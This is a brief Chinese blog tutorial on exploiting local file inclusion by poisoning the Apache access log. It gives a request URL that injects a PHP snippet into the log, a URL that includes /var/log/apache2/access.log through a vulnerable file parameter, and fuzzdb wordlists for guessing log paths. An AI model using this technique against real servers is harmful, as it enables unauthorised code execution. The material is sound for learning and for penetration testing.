文件包含漏洞利用-HTTP日志包含

QQ截图20210915164435

当我们发现一个本地文件包含漏洞却没有文件上传点时,也可以包含http日志

先访问http://192.168.1.1/<?php phpinfo();?> ,将一句话写入日志文件。

随后包含日志:/var/log/apache2/access.log,访问:

http://192.168.1.1/baohan.php?file=/var/log/apache2/access.log

如果不知道HTTP日志的保存位置,可以通过fuzz日志路径,推荐字典:

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/lfi/common-unix-httpd-log-locations.txt

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/lfi/common-ms-httpd-log-locations.txt

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容